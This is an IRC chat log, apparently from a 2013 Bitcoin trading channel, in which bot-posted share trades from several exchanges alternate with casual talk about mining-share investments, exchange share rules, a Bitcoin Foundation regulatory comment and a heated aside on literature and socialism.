17:12:50 lelelelel i like being hired to troll usagi Jul 20 17:12:52 a title shared with a few others, it's true, but nevertheless. Jul 20 17:13:19 [BTCTC] [AMC-PT] 1 @ 0.002511 BTC [+] Jul 20 17:13:36 I remember looking at BMF a while ago and saying: most mining assets are losers, why would I want to invest in a collection of all the worst? Jul 20 17:13:39 mircea_popescu: yes he has been volunteering, added indents and otherwise rearranging the source code according to his grep tool, he got mad at bitcoin devs for not listening to him haha Jul 20 17:14:04 well im glad he's found his place in the world. Jul 20 17:14:14 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003906 = 0.0391 BTC [-] Jul 20 17:14:16 hopefully they hired insanikatz too. Jul 20 17:14:26 he' spushing for ripple to take the rippling out of ripple Jul 20 17:14:36 peterl deprived is probably the one sane person that spent the time on an usagi monograph Jul 20 17:14:48 so perhaps grep his post history for usagi Jul 20 17:14:58 why would mining stabalize? Jul 20 17:14:59 you are bragging you only lost 10%? Jul 20 17:15:39 no, they will just keep making more and more efficient mining rigs Jul 20 17:17:33 some investments are more certain to lose though, so I avoid those Jul 20 17:18:19 Asicminer is not down 60% since june Jul 20 17:18:28 if one managed to avoid all losers they'd actually do pretty good in btc Jul 20 17:18:56 predicted what? Jul 20 17:19:26 How many shares did Vorhees hold on S.Dice? Jul 20 17:19:54 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003904 = 0.039 BTC [-] Jul 20 17:20:10 CheckDavid 10mn on ipo, something like 2-3mn after that Jul 20 17:22:24 ah nm, that's how many he sold. he held the rest up to 50mn Jul 20 17:22:25 I really have not looked at it. Should I? Jul 20 17:23:14 mircea_popescue: yeah, avoiding losers I have been up about 50% the past two months. Jul 20 17:25:15 deposits flushed. Jul 20 17:25:20 i think DeadTerra also works for OpenCoin if I remember correctly Jul 20 17:25:59 I wonder when they will snatch me from my bed in the middle of the night? Jul 20 17:26:14 mircea_popescu, what does that mean? That he put 10 Million for sale on an exchange, but eventually bought 2-3 Million for himself? Jul 20 17:26:56 CheckDavid the contracts on mpex usually call for a specified ipo allocation and locktime Jul 20 17:27:24 in this case s.dice was split in 100mn shares, and the ipo was 10mn. a month after the ipo sold out erik got the rest of his shares in his acct Jul 20 17:27:30 activemining is a copy of asicminer? Jul 20 17:27:35 and of those iirc he said he sold like 2-3 mn Jul 20 17:27:39 DeadTerra works for OpenCoin? Jul 20 17:27:49 ya when did that happen ?! Jul 20 17:28:03 So that means only 10% of the business was on the exchange? Jul 20 17:28:23 all of it was on the exchange. a large part held by the owner. Jul 20 17:28:48 Oh, meaning 90 Million were not for sale, as they were held by the owner right? Jul 20 17:29:08 50mn were not for sale at any point, as mpex contracts don't allow management to sell more than half. Jul 20 17:29:17 40mn were in his acct after ipo completion, sitting there Jul 20 17:29:57 [BTCTC] [AMC-PT] 21 @ 0.0025 = 0.0525 BTC [-] Jul 20 17:30:12 peterl i guess at least it'd like to be. Jul 20 17:30:14 [BTCTC] [BITVPS] 85 @ 0.002089 = 0.1776 BTC [-] Jul 20 17:30:17 oh, I see, why don't you allow more than half? To avoid issues such as how to enforce majority of share holders rights? Jul 20 17:30:22 In case someone bought >50% Jul 20 17:30:36 that's exactly why. shares are nonvoting. Jul 20 17:31:27 I see Jul 20 17:31:58 I don't recall where DeadTerra mentioned it, at some point in the last couple mos he mentioned he got a job there, I'm trying to find the post to verify Jul 20 17:32:09 there's serious structural problems still with the bitcoin financial market, perhaps best tipyfied by peterl's remark above. Jul 20 17:32:15 [BTCTC] [LTC-ATF.B2] 1 @ 0.01 BTC [+] Jul 20 17:32:26 bluntly put people are so fucking retarded it's lucrative to create a paper copy of a successful asset Jul 20 17:32:42 how do I show serious problem? Jul 20 17:32:45 because of this sad state of affairs cutting their voice by disenfranchisement is actually best for everyone. Jul 20 17:32:52 oh, I see Jul 20 17:33:32 i imagine as we develop better controls for the entire set of problems of the gpg contract we'll be able to bring the hare voting franchise back. Jul 20 17:33:38 or at least i hope so. Jul 20 17:33:47 [BTCTC] [AMC-PT] 275 @ 0.0025 = 0.6875 BTC [-] Jul 20 17:34:31 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [-] Jul 20 17:34:35 ;;bc,stats Jul 20 17:34:36 also, http://trilema.com/2012/gpg-contracts/ Jul 20 17:34:37 Current Blocks: 247571 | Current Difficulty: 2.61628756825699E7 | Next Difficulty At Block: 247967 | Next Difficulty In: 396 blocks | Next Difficulty In About: 2 days, 2 hours, 49 minutes, and 24 seconds | Next Difficulty Estimate: 30691571.3086 | Estimated Percent Change: 17.30962 Jul 20 17:34:52 wait, are you trying to cut my voice or activeminer's? Jul 20 17:35:16 i can find DT's post about getting a job but the OpenCoin specificty is either edited out or I read it elsewhere Jul 20 17:35:17 peterl shareholder's generally. they don't get to have a say in how company is run. Jul 20 17:35:28 so choose to believe me or not to Jul 20 17:35:30 :/ Jul 20 17:35:35 ThickAsThieves is there some way you can be sure ? Jul 20 17:35:40 that it was edited out i mean Jul 20 17:35:47 Ukyo would know I bet Jul 20 17:35:48 [BTCTC] [AMC-PT] 150 @ 0.0025 = 0.375 BTC [-] Jul 20 17:35:56 mor elikely i read it elsewhere Jul 20 17:36:02 a ok Jul 20 17:36:03 than it being edited Jul 20 17:36:33 this is one of the more subtle advantages of having pr ppls to read your shit for you. Jul 20 17:36:51 two heads are better than one when it comes to "hmm, was it edited or wtf ?!" Jul 20 17:37:37 i'm guesssing it's in a channel chat log somewhere, but not up to digging Jul 20 17:38:18 ha! Jul 20 17:38:23 i found it in like 3secs Jul 20 17:38:24 [05:38] I am working for OpenCoin and then a swedish fixed exchanged called btcx.se :) Jul 20 17:38:32 a i c Jul 20 17:39:00 [BTCTC] [ASICMINER-PT] 1 @ 4.653 BTC [-] Jul 20 17:39:02 [BTCTC] [ASICMINER-PT] 5 @ 4.652 = 23.26 BTC [-] Jul 20 17:39:22 [BTCTC] [COGNITIVE] 1 @ 0.848898 BTC [-] Jul 20 17:39:38 [BTCTC] [ASICMINER-PT] 7 @ 4.62 = 32.34 BTC [-] Jul 20 17:39:40 [BTCTC] [ASICMINER-PT] 7 @ 4.62 = 32.34 BTC [-] Jul 20 17:39:42 [BTCTC] [ASICMINER-PT] 5 @ 4.6112 = 23.056 BTC [-] Jul 20 17:39:44 [BTCTC] [ASICMINER-PT] 1 @ 4.611 BTC [-] Jul 20 17:39:46 [BTCTC] [ASICMINER-PT] 10 @ 4.61 = 46.1 BTC [-] Jul 20 17:39:49 [BTCTC] [ASICMINER-PT] 1 @ 4.600101 BTC [-] Jul 20 17:39:52 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [-] Jul 20 17:39:56 [BTCTC] [ASICMINER-PT] 2 @ 4.599 = 9.198 BTC [-] Jul 20 17:40:00 [BTCTC] [ASICMINER-PT] 10 @ 4.581 = 45.81 BTC [-] Jul 20 17:42:19 [BTCTC] [AMC-PT] 12354 @ 0.0025 = 30.885 BTC [-] Jul 20 17:44:21 could you give a year range for yuan, tang and qing dynasties for the non-chinese historically adept? Jul 20 17:54:08 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003844 BTC [-] Jul 20 17:59:59 I mean like is that 1000 ad or 2000 bc? Jul 20 18:02:49 http://www.scribd.com/doc/154799860/Bitcoin-Foundation-Comments-on-Liberty-Reserve-Special-Measures-NPRM Jul 20 18:02:52 Bitcoin Foundation Comments on Liberty Reserve Special Measures NPRM Jul 20 18:04:48 isn't it perhaps time the blogging foundation moves off scribd to say wordpress ? Jul 20 18:05:45 "However, the Bitcoin Foundation is concerned that the statements in question may bemisinterpreted to suggest that all virtual currency operators are inherently suspect. In particular,the Bitcoin Foundation is concerned that the statements will be misread by the financialinstitutions implementing the final rule adopted in this proceeding (the “Final Rule”) to suggestthat virtual Jul 20 18:05:45 currencies in general should be subject to a higher degree of scrutiny, and thechilling effect this could have on the still nascent bitcoin industry. The Bitcoin Foundation isalso concerned that certain statements could lead to confusion concerning the money launderingregulatory framework as applied to virtual currencies in general and bitcoin in particular." Jul 20 18:06:34 "Any Final Rule Should Clarify that Irrevocable Transactions May ServeLegitimate Purposes" Jul 20 18:08:13 these people are uniquely clueless. Jul 20 18:08:36 [BTCTC] [AMC-PT] 200 @ 0.002579 = 0.5158 BTC [+] Jul 20 18:08:38 [BTCTC] [AMC-PT] 3650 @ 0.00258 = 9.417 BTC [+] Jul 20 18:15:39 [BTCTC] [AMC-PT] 600 @ 0.00258 = 1.548 BTC [+] Jul 20 18:17:46 https://btct.co/security/AMC-PT bets on whether both the top bid & ask are the issuer? Jul 20 18:17:49 BTC-TC: BTC Trading Corp - View Security Jul 20 18:18:58 [BTCTC] [TAT.ASICMINER] 34 @ 0.045092 = 1.5331 BTC [-] Jul 20 18:25:48 TAT: who else would have or want that many shares? Jul 20 18:27:26 of what? Jul 20 18:28:32 namworld: ThickAsThieves: https://btct.co/security/AMC-PT bets on whether both the top bid & ask are the issuer? Jul 20 18:29:42 [HAVELOCK] [AM100] 22 @ 0.04334 = 0.9535 BTC [-] Jul 20 18:29:46 [HAVELOCK] [AM100] 3 @ 0.0436 = 0.1308 BTC [+] Jul 20 18:32:06 I bet it's a confused individual thinking it's AsicMiner Jul 20 18:32:26 People don't read, remember? Jul 20 18:33:54 i'm with the issuer theory Jul 20 18:34:00 how'd we settle this tho ? Jul 20 18:35:21 ask burnsides to check which account it is? Jul 20 18:35:57 burnside can't tell who make bids/asks... Jul 20 18:35:58 I doubt he would tell us something like that? Jul 20 18:36:07 why not? Jul 20 18:36:29 doesn't he control the database? Jul 20 18:37:08 can't it be settled by examining public assets list? Jul 20 18:38:01 that wouldn't show who is doing the bid Jul 20 18:38:04 if the ask is too high that only issuer account has so many shares Jul 20 18:38:20 oh yes, it won't show the bid Jul 20 18:38:27 unless you sell into the bid and see where the shares end up Jul 20 18:39:33 He can't because it would piss people if anyone can just ask and burnside just tell back: Oh yeah, that guy is buying. Jul 20 18:39:50 People expect some kind of privacy as to what stuff they purchase. Jul 20 18:40:04 can't and won't are not nescesarily the same thing Jul 20 18:41:54 what sort of dividend will bitvps have this month? Jul 20 18:42:42 [MPEX] [S.MPOE] 1100 @ 0.00088744 = 0.9762 BTC [-] Jul 20 18:43:18 Everyone ask... I can't disclose how it's performing like that. I prefer it go out as an official announcement at the end of each month, on the website. Jul 20 18:43:35 It's made public to everyone at the same time. Jul 20 18:43:42 Not everyone are on IRC Jul 20 18:44:30 oh,ok, what I meant is are you going to keep some as reserve or pay out all the profits as dividend? Jul 20 18:44:33 [MPEX] [S.MG] 10000 @ 0.0002 = 2 BTC [-] Jul 20 18:46:59 [BTCTC] [DMS.PURCHASE] 92 @ 0.039416 = 3.6263 BTC [-] Jul 20 18:47:08 [BTCTC] [ASICMINER-PT] 1 @ 4.679999 BTC [+] Jul 20 18:47:34 [BTCTC] [AMC-PT] 400 @ 0.002569 = 1.0276 BTC [-] Jul 20 18:47:36 [BTCTC] [AMC-PT] 600 @ 0.00257 = 1.542 BTC [+] Jul 20 18:49:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.045092 BTC [-] Jul 20 18:50:09 Burnside is talking about highlighting orders made by the issuer Jul 20 18:50:15 this seems somewhat retarded to me Jul 20 18:50:32 won't they just use a sockpuppet account? Jul 20 18:50:36 yep Jul 20 18:53:04 [HAVELOCK] [SMG] 620 @ 0.00026502 = 0.1643 BTC [-] Jul 20 18:53:06 [HAVELOCK] [SMG] 2000 @ 0.00026501 = 0.53 BTC [-] Jul 20 18:53:09 [HAVELOCK] [SMG] 500 @ 0.000261 = 0.1305 BTC [-] Jul 20 18:53:11 [HAVELOCK] [SMG] 2800 @ 0.0002605 = 0.7294 BTC [-] Jul 20 18:53:13 [HAVELOCK] [SMG] 4000 @ 0.0002601 = 1.0404 BTC [-] Jul 20 18:53:15 [HAVELOCK] [SMG] 80 @ 0.00026005 = 0.0208 BTC [-] Jul 20 18:53:18 namworld: bitbet - 1230 shares on mpex for sale at .001, 1000 shares bid at .0019 on btct - arbitrage much? Jul 20 18:53:22 [BTCTC] [TAT.ASICMINER] 4 @ 0.045093 = 0.1804 BTC [+] Jul 20 18:53:44 [HAVELOCK] [SDSTM] 1 @ 0.01188 BTC [+] Jul 20 18:54:25 [MPEX] [S.BBET] 1000 @ 0.001 = 1 BTC [-] Jul 20 18:54:36 [HAVELOCK] [HIM] 1 @ 0.252 BTC [-] Jul 20 18:54:36 there we go Jul 20 18:54:58 [BTCTC] [LTC-ATF.B2] 9 @ 0.01 = 0.09 BTC [+] Jul 20 18:58:15 [MPEX] [S.MG] 5000 @ 0.0002 = 1 BTC [-] Jul 20 18:58:22 [MPEX] [S.MG] 8800 @ 0.0002 = 1.76 BTC [-] Jul 20 18:59:36 [BTCTC] [BASIC-MINING] 4 @ 0.725 = 2.9 BTC [-] Jul 20 18:59:58 [HAVELOCK] [SMG] 2920 @ 0.00026005 = 0.7593 BTC [-] Jul 20 19:00:00 [HAVELOCK] [SMG] 800 @ 0.00026001 = 0.208 BTC [-] Jul 20 19:00:03 [HAVELOCK] [SMG] 5080 @ 0.00026 = 1.3208 BTC [-] Jul 20 19:00:41 [HAVELOCK] [AM100] 9 @ 0.043888 = 0.395 BTC [+] Jul 20 19:01:32 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.003911 = 0.0313 BTC [+] Jul 20 19:02:23 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003721 = 0.0372 BTC [-] Jul 20 19:02:25 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003721 = 0.0372 BTC [-] Jul 20 19:02:27 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00372 BTC [-] Jul 20 19:02:29 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00371 = 0.0074 BTC [-] Jul 20 19:02:29 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.0037 = 0.0185 BTC [-] Jul 20 19:04:13 [BTCTC] [S.MPOE-PT] 1 @ 0.000943 BTC [-] Jul 20 19:04:25 [BTCTC] [COGNITIVE] 2 @ 0.847871 = 1.6957 BTC [-] Jul 20 19:07:04 [BTCTC] [AMC-PT] 400 @ 0.002508 = 1.0032 BTC [-] Jul 20 19:07:27 [BTCTC] [AMC-PT] 22925 @ 0.0025 = 57.3125 BTC [-] Jul 20 19:09:37 [BTCTC] [AMC-PT] 24 @ 0.002509 = 0.0602 BTC [+] Jul 20 19:10:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0451 BTC [+] Jul 20 19:11:11 [BTCTC] [AMC-PT] 476 @ 0.002509 = 1.1943 BTC [+] Jul 20 19:11:13 [BTCTC] [AMC-PT] 4000 @ 0.002597 = 10.388 BTC [+] Jul 20 19:11:14 [BTCTC] [AMC-PT] 150 @ 0.002598 = 0.3897 BTC [+] Jul 20 19:11:15 [BTCTC] [AMC-PT] 1248 @ 0.002599 = 3.2436 BTC [+] Jul 20 19:11:16 [BTCTC] [AMC-PT] 200 @ 0.00261 = 0.522 BTC [+] Jul 20 19:11:17 [BTCTC] [AMC-PT] 300 @ 0.00262 = 0.786 BTC [+] Jul 20 19:11:18 [BTCTC] [AMC-PT] 1226 @ 0.00263 = 3.2244 BTC [+] Jul 20 19:16:12 [BTCTC] [DMS.SELLING] 1 @ 0.024 BTC [-] Jul 20 19:16:29 [BTCTC] [DMS.SELLING] 4 @ 0.023511 = 0.094 BTC [-] Jul 20 19:16:49 [BTCTC] [LTC-ATF.B2] 12 @ 0.01 = 0.12 BTC [+] Jul 20 19:17:41 [BTCTC] [GSDPT] 5 @ 0.003302 = 0.0165 BTC [-] Jul 20 19:17:43 [BTCTC] [GSDPT] 195 @ 0.003301 = 0.6437 BTC [-] Jul 20 19:17:47 [MPEX] [S.MPOE] 3190 @ 0.00088649 = 2.8279 BTC [-] Jul 20 19:17:49 [MPEX] [S.MPOE] 2725 @ 0.00088771 = 2.419 BTC [+] Jul 20 19:18:31 [BTCTC] [DMS.PURCHASE] 100 @ 0.039416 = 3.9416 BTC [-] Jul 20 19:18:46 usagi, what are you doing for a living ? Jul 20 19:20:04 http://trilema.com/2013/art-over-time-a-graph-of-progress/ Jul 20 19:20:08 Art over time, a graph of progress. pe Trilema - Un blog de Mircea Popescu. Jul 20 19:20:14 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003906 = 0.0078 BTC [+] Jul 20 19:20:16 if anyone feels like reading some of the most amusing purple prose i've seen this month Jul 20 19:25:33 mircea_popescue: what is this garbage? Jul 20 19:26:33 cue ?! Jul 20 19:27:04 [HAVELOCK] [SMG] 200 @ 0.00026 = 0.052 BTC [-] Jul 20 19:27:07 anyway. purple prose, it's a thing. pretty much the only usable literary output of our american friends. roughly the equivalent of kitsch, something to laugh at smugly. Jul 20 19:27:22 oops, sorry, I always want to put an e at the end, must be the english in me, we don't like words ending in u Jul 20 19:27:45 [HAVELOCK] [HIM] 3 @ 0.252 = 0.756 BTC [-] Jul 20 19:27:52 but does anybody think it is art worth praising? Jul 20 19:28:13 I am sure you could find rubbish from 100 years ago to compare it with Jul 20 19:28:31 [HAVELOCK] [HIM] 3 @ 0.268 = 0.804 BTC [+] Jul 20 19:30:01 find it. Jul 20 19:30:52 i don't think it's worth praising in the slightest. i think it has to be pointed out it's the foremost art coming out of the bankrupt ideology of socialism. Jul 20 19:31:17 right, but did you really have to repeat it? Jul 20 19:31:21 stalin's soviet realism and america's purple prose crap are the syphilitic sores of why socialism does not work Jul 20 19:31:24 not ever, no way. Jul 20 19:31:46 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003906 = 0.0391 BTC [+] Jul 20 19:34:27 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003906 = 0.0078 BTC [+] Jul 20 19:35:30 [BTCTC] [TAT.ASICMINER] 2 @ 0.0451 = 0.0902 BTC [+] Jul 20 19:36:09 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003701 = 0.037 BTC [-] Jul 20 19:36:13 [BTCTC] [AMC-PT] 500 @ 0.002501 = 1.2505 BTC [-] Jul 20 19:36:13 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0037 = 0.37 BTC [-] Jul 20 19:36:14 [BTCTC] [AMC-PT] 56521 @ 0.0025 = 141.3025 BTC [-] Jul 20 19:36:16 [BTCTC] [AMC-PT] 1700 @ 0.0025 = 4.25 BTC [-] Jul 20 19:36:17 [BTCTC] [TAT.VIRTUALMINE] 95 @ 0.003662 = 0.3479 BTC [-] Jul 20 19:36:18 [BTCTC] [AMC-PT] 515 @ 0.0025 = 1.2875 BTC [-] Jul 20 19:36:20 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003619 = 0.0072 BTC [-] Jul 20 19:36:21 [BTCTC] [AMC-PT] 4330 @ 0.0025 = 10.825 BTC [-] Jul 20 19:36:21 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003615 = 0.0362 BTC [-] Jul 20 19:36:22 [BTCTC] [AMC-PT] 880 @ 0.0025 = 2.2 BTC [-] Jul 20 19:36:23 [BTCTC] [TAT.VIRTUALMINE] 94 @ 0.003614 = 0.3397 BTC [-] Jul 20 19:36:25 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.003613 = 0.1084 BTC [-] Jul 20 19:36:26 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.003612 = 0.0108 BTC [-] Jul 20 19:36:28 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.003612 = 0.7224 BTC [-] Jul 20 19:36:29 [BTCTC] [TAT.VIRTUALMINE] 118 @ 0.003611 = 0.4261 BTC [-] Jul 20 19:37:45 [BTCTC] [CRYPTO-TRADE] 7 @ 0.195001 = 1.365 BTC [-] Jul 20 19:37:47 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003612 = 0.0361 BTC [+] Jul 20 19:37:48 [BTCTC] [CRYPTO-TRADE] 10 @ 0.195 = 1.95 BTC [-] Jul 20 19:37:49 [BTCTC] [TAT.VIRTUALMINE] 82 @ 0.003611 = 0.2961 BTC [-] Jul 20 19:37:50 [BTCTC] [CRYPTO-TRADE] 5 @ 0.194018 = 0.9701 BTC [-] Jul 20 19:37:51 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.0036 = 0.0288 BTC [-] Jul 20 19:37:53 [BTCTC] [CRYPTO-TRADE] 2 @ 0.194017 = 0.388 BTC [-] Jul 20 19:37:55 [BTCTC] [CRYPTO-TRADE] 1 @ 0.194 BTC [-] Jul 20 19:37:57 [BTCTC] [CRYPTO-TRADE] 10 @ 0.194 = 1.94 BTC [-] Jul 20 19:37:58 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1939 BTC [-] Jul 20 19:38:00 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1938 BTC [-] Jul 20 19:38:02 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1937 BTC [-] Jul 20 19:38:03 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1936 BTC [-] Jul 20 19:38:09 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1935 BTC [-] Jul 20 19:38:10 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1934 BTC [-] Jul 20 19:38:12 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1933 BTC [-] Jul 20 19:38:13 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1932 BTC [-] Jul 20 19:38:24 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1931 BTC [-] Jul 20 19:38:25 [BTCTC] [CRYPTO-TRADE] 1 @ 0.193 BTC [-] Jul 20 19:38:27 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1929 BTC [-] Jul 20 19:38:28 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1928 BTC [-] Jul 20 19:38:30 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1927 BTC [-] Jul 20 19:38:31 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1926 BTC [-] Jul 20 19:38:33 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1925 BTC [-] Jul 20 19:38:33 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1924 BTC [-] Jul 20 19:38:35 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1923 BTC [-] Jul 20 19:38:36 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1922 BTC [-] Jul 20 19:38:38 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1921 BTC [-] Jul 20 19:38:39 [BTCTC] [CRYPTO-TRADE] 1 @ 0.192 BTC [-] Jul 20 19:38:41 [BTCTC] [CRYPTO-TRADE] 5 @ 0.192 = 0.96 BTC [-] Jul 20 19:39:02 [BTCTC] [AMC-PT] 1390 @ 0.0025 = 3.475 BTC [-] Jul 20 19:39:06 [HAVELOCK] [AM100] 20 @ 0.043888 = 0.8778 BTC [+] Jul 20 19:39:46 [MPEX] [S.MPOE] 5300 @ 0.000886 = 4.6958 BTC [-] Jul 20 19:41:10 [HAVELOCK] [AM100] 61 @ 0.043888 = 2.6772 BTC [+] Jul 20 19:41:36 [HAVELOCK] [AM100] 40 @ 0.04388888 = 1.7556 BTC [+] Jul 20 19:41:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.0451 BTC [+] Jul 20 19:42:17 [BTCTC] [COGNITIVE] 1 @ 0.847866 BTC [-] Jul 20 19:42:19 [BTCTC] [COGNITIVE] 8 @ 0.847867 = 6.7829 BTC [+] Jul 20 19:42:21 [BTCTC] [COGNITIVE] 4 @ 0.84789 = 3.3916 BTC [+] Jul 20 19:42:49 [BTCTC] [TAT.ASICMINER] 2 @ 0.04559 = 0.0912 BTC [+] Jul 20 19:43:46 [HAVELOCK] [AM100] 9 @ 0.0439 = 0.3951 BTC [+] Jul 20 19:47:10 [BTCTC] [TAT.ASICMINER] 2 @ 0.04559 = 0.0912 BTC [+] Jul 20 19:49:58 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [-] Jul 20 19:50:12 [BTCTC] [TAT.ASICMINER] 25 @ 0.0455 = 1.1375 BTC [-] Jul 20 19:50:56 [BTCTC] [TAT.ASICMINER] 43 @ 0.045627 = 1.962 BTC [+] Jul 20 19:51:18 [MPEX] [S.MPOE] 7150 @ 0.00088771 = 6.3471 BTC [+] Jul 20 19:51:47 [BTCTC] [AMC-PT] 125 @ 0.0025 = 0.3125 BTC [-] Jul 20 19:51:57 [BTCTC] [TAT.ASICMINER] 18 @ 0.045628 = 0.8213 BTC [+] Jul 20 19:52:03 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [-] Jul 20 19:52:48 [BTCTC] [TAT.ASICMINER] 47 @ 0.045629 = 2.1446 BTC [+] Jul 20 19:53:15 [BTCTC] [AMC-PT] 270 @ 0.0025 = 0.675 BTC [-] Jul 20 19:58:18 [HAVELOCK] [AM100] 360 @ 0.04388888 = 15.8 BTC [-] Jul 20 19:59:52 [BTCTC] [AMC-PT] 20 @ 0.0025 = 0.05 BTC [-] Jul 20 20:02:57 [BTCTC] [ASICMINER-PT] 1 @ 4.669999 BTC [-] Jul 20 20:03:40 [BTCTC] [ASICMINER-PT] 2 @ 4.669999 = 9.34 BTC [-] Jul 20 20:03:52 [BTCTC] [AMC-PT] 207 @ 0.0025 = 0.5175 BTC [-] Jul 20 20:04:03 wtf does that have with socialism Jul 20 20:04:56 [BTCTC] [AMC-PT] 8 @ 0.0025 = 0.02 BTC [-] Jul 20 20:05:23 [BTCTC] [AMC-PT] 750 @ 0.0025 = 1.875 BTC [-] Jul 20 20:06:00 i'd take such pink literary shit over violence and diseases any time. Jul 20 20:06:13 [BTCTC] [AMC-PT] 8 @ 0.0025 = 0.02 BTC [-] Jul 20 20:06:56 the latter inevitably happening if any form of socialism is abolished Jul 20 20:08:13 i wouldn't. Jul 20 20:08:23 let there be violence and disease and good fucking plays at the opera. Jul 20 20:09:15 [HAVELOCK] [AM100] 91 @ 0.0439 = 3.9949 BTC [+] Jul 20 20:12:16 [HAVELOCK] [SDSTM] 2 @ 0.011885 = 0.0238 BTC [+] Jul 20 20:15:22 Good plays still exist. You just have to go dig through all the nonsense. Jul 20 20:15:40 I'm sure there was plenty of bad and of nonsense back then too Jul 20 20:15:55 It just got discarded from history as irrelevant. Jul 20 20:17:08 exactly. that's the point. Jul 20 20:17:21 and the discarding from history as irrelevant started at age three. Jul 20 20:17:39 it wasn't discarded from history, it was discarded from life too. Jul 20 20:20:58 [BTCTC] [BASIC-MINING] 4 @ 0.725 = 2.9 BTC [-] Jul 20 20:21:57 LOL trollbox on btc-e is saying how the first bitcoin transaction was in 1972 Jul 20 20:22:02 I'm pretty sure no one was spared and crap was popular too pretty much throughout history, just like today. What was bad just wasn't deemed worthy of preserving. Jul 20 20:22:24 BTC-E trollbox is irrelevant =/ Jul 20 20:22:41 so is comedy..your point? Jul 20 20:23:00 Namworld this'd be anachronism Jul 20 20:23:01 ? Jul 20 20:23:19 ie, the mistaken belief that ancient romans wore stetsons and those rhinestone abominations around their necks Jul 20 20:24:53 Is that really a thing? Jul 20 20:25:05 What kind of nonsense is that... Jul 20 20:26:17 [BTCTC] [BTC-TRADING-PT] 9 @ 0.9568 = 8.6112 BTC [+] Jul 20 20:26:25 [BTCTC] [RSM] 2 @ 0.018 = 0.036 BTC [+] Jul 20 20:26:47 [HAVELOCK] [SMG] 500 @ 0.00028 = 0.14 BTC [+] Jul 20 20:27:39 [HAVELOCK] [SMG] 6800 @ 0.00028 = 1.904 BTC [+] Jul 20 20:31:31 [HAVELOCK] [AM100] 2 @ 0.043111 = 0.0862 BTC [-] Jul 20 20:32:05 [HAVELOCK] [AM100] 98 @ 0.043111 = 4.2249 BTC [-] Jul 20 20:32:50 [BTCTC] [ASICMINER-PT] 2 @ 4.669999 = 9.34 BTC [-] Jul 20 20:32:52 [BTCTC] [ASICMINER-PT] 5 @ 4.67 = 23.35 BTC [+] Jul 20 20:32:54 [BTCTC] [ASICMINER-PT] 1 @ 4.689999 BTC [+] Jul 20 20:33:00 [BTCTC] [ASICMINER-PT] 2 @ 4.69 = 9.38 BTC [+] Jul 20 20:36:16 [BTCTC] [DMS.MINING] 2 @ 0.016 = 0.032 BTC [-] Jul 20 20:36:29 Well I'll be out for the weekend, goodbye Jul 20 20:37:22 [BTCTC] [ASICMINER-PT] 1 @ 4.601011 BTC [-] Jul 20 20:39:21 [BTCTC] [AMC-PT] 1600 @ 0.0025 = 4 BTC [-] Jul 20 20:41:24 [BTCTC] [AMC-PT] 805 @ 0.0025 = 2.0125 BTC [-] Jul 20 20:41:49 [BTCTC] [TAT.ASICMINER] 81 @ 0.045629 = 3.6959 BTC [+] Jul 20 20:44:42 [BTCTC] [DMS.SELLING] 71 @ 0.024399 = 1.7323 BTC [+] Jul 20 20:46:25 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.00389 = 0.0156 BTC [+] Jul 20 20:46:51 I thought graphics weren't allowed on the forum ads? Jul 20 20:47:04 VMC has a monster logo in ads now Jul 20 20:47:29 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [-] Jul 20 20:48:09 looks like he built the shapes with code Jul 20 20:48:25 [BTCTC] [AMC-PT] 40 @ 0.0025 = 0.1 BTC [-] Jul 20 20:50:52 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [-] Jul 20 20:51:38 [BTCTC] [AMC-PT] 5 @ 0.0025 = 0.0125 BTC [-] Jul 20 20:51:46 [BTCTC] [AMC-PT] 8380 @ 0.0025 = 20.95 BTC [-] Jul 20 21:04:17 [BTCTC] [TAT.ASICMINER] 30 @ 0.045629 = 1.3689 BTC [+] Jul 20 21:04:19 [BTCTC] [TAT.ASICMINER] 13 @ 0.04563 = 0.5932 BTC [+] Jul 20 21:04:21 [BTCTC] [TAT.ASICMINER] 5 @ 0.04595 